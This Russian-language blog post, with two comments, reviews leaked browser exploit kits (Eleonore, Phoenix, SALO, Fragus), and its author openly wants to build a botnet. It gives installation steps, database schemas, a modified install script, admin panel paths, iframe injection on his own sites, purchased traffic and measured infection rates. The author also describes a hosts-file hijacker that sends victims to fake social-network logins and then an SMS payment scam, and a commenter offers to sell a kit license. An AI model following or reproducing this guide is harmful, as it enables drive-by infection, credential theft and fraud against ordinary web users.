полуприватные связки сплойтов

Хочу я заиметь собственный скромненький небольшой ботнетик, поэтому начал присматриватся к связкам сплойтов. Покупать пока я не решился т.к. стоят они мягко сказать дохрена, хотя есть варианты с арендой но все же…

Под связки нужно написать какого-нить бота, ну или купить. Конечно, лучше всего купить какого-нибудь Зевса, но стоит он чуть ли не дороже связок. Поэтому я решил не торопить события и написал свою простенькую прожку, которая подменяет hosts на фейки соц.сетей, где собственно зараженный сначала отдаст мне свой логин с паролем, а затем получит окно с активацией под SMS. Префиксов, слава Богу, у меня хватало, так что дело встало за прогой, о ней я напишу в следующей статье. А пока перейдем к связкам.

Найти в паблике более-менне актуальные связки оказалось не такой уж и простой задачей, но я, гугл и яндекс все же справились с ней.
Все связки я качал отсюда, в связи с чем я очень благодарен этому форуму и тем кто выкладывал связки лично.

То что я здесь расскажу скорее всего мало относится к приватным (платным) версиям этих связок и актуально только для этих полуприватных вариантов.

Значит как я действовал:

  • устанавливал связку на заренее подготовленный хостинг
  • закидывал свою программку
  • брал один из своих сайтиков и ставил туда iframe на связку
  • пробывал связку через Virtual Box с Windows XP на IE6, IE8 и FF 3.5
  • в случае если у какой-нибудь вариант из 3-х приведенных в пункте выше загружал программку, то покупал через одну систему обмена траффиком от 0.5 до 1к траффа

Необходимо так же заметить, что установка этих вариантов этих связок обладает не самым дружественным интерфейсом и мне приходилось самому немного править некоторые скрипты. Короче без минимальных знаний PHP и маленького опыта работы с PHPMyAdmin тут не обойтись.

Eleonore Exp pack 1.3.1

Установка

После того как закинули на хостинг, делаем БД и прописываем настройки в файле ‘config.php’. В этом же файле строки:

<?php
/*$to = “cmail014@gmail.com”;
$from = “someonelse@example.com”;
$headers = “From: $from”;
mail($to,$subject,$headers,$admin,$pwd);*/
?>

либо удаляем, либо комментируем.

Далее если мы почитаем файл readme.txt, то нам нужно запустить ‘install.php’, однако в данном варианте его нет, поэтому руками открываем файл ‘dump.sql’ и создаем структуру БД в соответсвии с запросами приведенными там, а конкретнее:

CREATE TABLE IF NOT EXISTS `seller` (
`id` int(10) NOT NULL auto_increment,
`name` varchar(30) default NULL,
`link` varchar(150) default NULL,
`desc` varchar(500) default NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=6 ;

и

CREATE TABLE IF NOT EXISTS `statistic` (
`id` int(10) NOT NULL auto_increment,
`ip` varchar(15) default NULL,
`os` varchar(30) default NULL,
`br` varchar(30) default NULL,
`country` varchar(2) default ‘–’,
`good` int(1) NOT NULL default ’0′,
`mv` int(1) NOT NULL default ’0′,
`refer` varchar(300) NOT NULL,
`date` datetime default ’2009-01-01 00:00:00′,
`spl` varchar(30) default NULL,
`seller` varchar(150) default NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=cp1251 AUTO_INCREMENT=149 ;

Теперь выставляем права на директорию load и все ее содержимое 0777.

Эксплуатация

Путь к админке: <имя домена>/stat.php.

В админке все предельно просто и понятно:

  • в разделе Resseler добавляем продавца или просто место откуда льется трафф и нажав на ссылку Links info получим ссылку, которую нужно вставить в iframe;
  • в File загружаем нашего бота;
  • в Main смотрим статистику

Итоги

Пробив плохой, а точнее на моих 2-х самых небезопасных в мире Windows XP без антивирей и без фаерволов, с самыми непропатченными браузерами в мире ничего не прокатило. Что касается интерфейса, то он достаточно хороший и приятный и самое главное удобный.

Вообщем, если в приватных версиях сплойты более работоспособны, то можно брать, правда цен я не знаю.

Phoenix exploit’s pack

Установка

  • делаем БД с пользователем
  • правим конфиг configuration/config.php
  • заливаем бота в корень и называем его exe.exe (не факт, т.к. нет мануала, я решил что это наиболее вероятный вариант)
  • запускаем recrypt.php и следуем инструкциям

Эксплуатация

Админка, если ее можно назвать таковой, находится по адресу <имя домена>/statistics.php.

Где смотреть ссыль под трафф я так и не нашел и методом тыка определил, что либо <имя домена>/index.php, либо <имя домена>/load.php.

Что касается пробива тут все плохо, и не смотря на то что на скрине стоит 100% пробива я могу сказать что он скорее нулевой.

Немного погуглив, я тут выяснил, что отвязали 2-ю версию phoenix и прочитать про нее можно здесь.

SALO PACK © UASC

Установка

  • создаем БД с пользователем
  • настраиваем cfg.php
  • запускаем sql.php

Эксплуатация

Админка находится по адресу: <имя домена>/admin.

Во вкладке ‘Настройка’ заливаем бота и производим другие настройки.

Ну и собственно ставим iframe на http://<имя домена>/index.php.

Итоги

Статистика врет – пробив нулевой или неуклонно стремится к нему.

Интерфейс хороший, я бы даже сказал приятный и удобный, там даже есть AJAX’ое обновление. Статистика достаточно детальная, впрочем вы сами можете это видеть на скрине.

Fragus exploit pack v1.0

Установка

  • создаем БД с пользователем под нее
  • правим конфиг /secure/config.php
  • открываем в редакторе /secure/_install.php и приводим его в следующий вид:

    <?php
    include (“config.php”);
    if (!($c = mysql_connect($config['MysqlHost'], $config['MysqlUser'], $config['MysqlPassword']))) {
    die(“Check host, user or password (./cfg/config.php)”);
    }
    if (!mysql_select_db($config['MysqlDbname'],$c)) {
    die(“Check DB name (./cfg/config.php)”);
    }

    if (!mysql_query(“DROP TABLE IF EXISTS `statistic`;”,$c)) die(“Check permission for user ‘”.$config['MysqlUser'].”‘”);

    if (!mysql_query(“CREATE TABLE `donkeys` (
    `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
    `ip` int(10) unsigned NOT NULL DEFAULT ’0′,
    `seller` int(10) unsigned NOT NULL DEFAULT ’0′,
    `browser` set(‘MSIE’,'FIREFOX’,'OPERA’,'CHROME’,'SAFARI’,'OTHER’) NOT NULL DEFAULT ‘OTHER’,
    `browser_version` varchar(10) NOT NULL DEFAULT ’0′,
    `os` set(’95′,’98′,’ME’,’2000′,’2003′,’XP’,'VISTA’,'WIN7′,’MAC’,'LINUX’,'OTHER’) NOT NULL DEFAULT ‘OTHER’,
    `os_version` set(‘SP1′,’SP2′,’SP3′,’SP4′,’OTHER’) NOT NULL DEFAULT ‘OTHER’,
    `country` tinyint(3) unsigned NOT NULL DEFAULT ’0′,
    `file` int(10) unsigned NOT NULL,
    `exploit` tinyint(2) unsigned NOT NULL DEFAULT ’0′,
    `status` set(‘NOT’,'LOAD’,'BACKCONNECT’) NOT NULL DEFAULT ‘NOT’,
    `time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
    PRIMARY KEY (`id`),
    UNIQUE KEY `ip` (`ip`)
    ) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=1 ;”,$c)) die(“Check permission for user ‘”.$config['MysqlUser'].”‘”);

    die(“<html><head><title>Unique pack</title><link type=’text/css’ rel=’stylesheet’ href=’./cfg/style.css’>
    </head><body bgcolor=’#E5E5E5′ text=’black’>
    <center><img src=’./img/logo.gif’><br>
    <br>Installation finished<br>Please delete install.php</center></body></html>”);
    ?>

  • теперь запускаем /secure/_install.php

Примечание: я уже не помню где точно, но в процессе работы в админке могут вылетать различные MySQL ошибки, так вот для того чтобы их не было смотрим скрипт в котором была ошибка и заменям там в функциях mysql_connect() и mysql_select_db() переменные, которые теоретически равны пользователю, имени БД, хосту БД и паролю админа БД на те переменные, что указанны в конфиге т.е. $config['MysqlHost'], $config['MysqlUser'] и т.д. или на строки с этими значениями, последний вариант это кривое программирование, однако в данном случае он предпочтительнее.

Эксплуатация

Интерфейс просто шикарен.

Я тут даже ничего описывать не буду, там и так все понятно. Хочу лишь отметить что ссыли в том числе и iframe связка выдает во всех возможных вариантах, включая криптованный.

Итоги

Из всех рассмотренных связок Fragus самая лучшая по всем показателям. И не смотря на то что она уже относительно древняя у нее не плохой пробив для публичной (1.68% это не совсем верно т.к. весомая часть трафика который я туда лил заведомо не мог прокатить, примерный пробив составит около 3-6%).

P.S. я был бы очень благодарен всем кто скинул бы сюда или мне лично ссылку на публичную или полуприватную связку, не рассмотренную здесь.

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

2 Comments to “полуприватные связки сплойтов”

  1. сергей пишет:

    fargus весьма хорошая связка. но пробив не радует(

  2. hima пишет:

    На фениксе пробив в среднем 15 на русском трафике, даже с биржи говнотраф 10 дает. Могу продать лицензию подешевле.

Leave a Reply to hima

(обязательно)

(обязательно)